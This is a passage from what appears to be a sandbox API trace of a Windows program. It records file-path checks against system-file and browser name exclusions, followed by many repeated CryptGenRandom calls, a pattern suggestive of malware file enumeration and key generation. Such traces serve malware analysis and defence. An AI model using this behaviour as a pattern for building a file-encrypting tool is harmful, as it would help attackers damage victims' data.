(pszFile="ipsjpn.xml", pszSpec="*CONFIG.SYS*") returned 0 [0147.616] PathMatchSpecW (pszFile="ipsjpn.xml", pszSpec="*IO.SYS*") returned 0 [0147.616] PathMatchSpecW (pszFile="ipsjpn.xml", pszSpec="*MSDOS.SYS*") returned 0 [0147.616] PathMatchSpecW (pszFile="ipsjpn.xml", pszSpec="*NTDETECT.COM*") returned 0 [0147.616] PathMatchSpecW (pszFile="ipsjpn.xml", pszSpec="*ntldr*") returned 0 [0147.616] PathMatchSpecW (pszFile="ipsjpn.xml", pszSpec="*chrome*") returned 0 [0147.616] PathMatchSpecW (pszFile="ipsjpn.xml", pszSpec="*opera*") returned 0 [0147.616] PathMatchSpecW (pszFile="ipsjpn.xml", pszSpec="*firefox*") returned 0 [0147.616] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsjpn.xml", pszSpec="*") returned 1 [0147.616] strlen (_Str="NMoreira") returned 0x8 [0147.616] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.616] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.616] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.616] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.616] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.616] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.616] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.616] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.616] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.616] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.616] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.616] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.616] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.616] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.616] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.616] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.616] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.616] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.616] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.616] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.616] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.617] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.617] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.617] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.617] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.617] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.617] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.617] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.617] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.617] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.617] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.617] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.617] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.617] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.617] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.617] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.617] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.617] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.617] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.617] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.617] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.617] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.617] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.617] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.617] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.617] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.617] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.617] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.617] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.617] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.617] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.617] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.617] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.617] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.617] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.617] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.617] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.617] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.617] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.617] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.617] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.617] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.617] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.617] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.617] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.617] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.618] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.618] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.618] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.618] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.618] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.618] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.618] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.618] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.618] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.618] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.618] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.618] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.618] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.618] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.618] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.618] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.618] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.618] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.618] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.618] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.618] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.618] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.618] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.618] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.618] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.618] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.618] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.618] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.618] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.618] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.618] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.618] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.618] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.618] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.618] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.618] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.618] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.618] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.618] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.618] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.618] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.618] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.618] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.618] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.618] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.618] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.618] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.618] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.618] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.618] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.618] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.619] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.619] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.619] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.619] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.619] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.619] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.619] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.619] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.619] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.619] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.619] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.619] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.619] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.619] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.619] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.619] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.619] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.619] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.619] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.619] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.619] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.619] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.619] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.619] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.619] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.619] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.619] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.619] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.619] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.619] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.619] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.619] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.619] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.619] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.619] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.619] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.619] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.619] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.619] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.619] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.619] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.619] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.619] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.619] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.619] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.619] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.619] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.619] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.619] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.619] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.620] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.620] CryptGenRandom (in: hProv=0x8bf310, 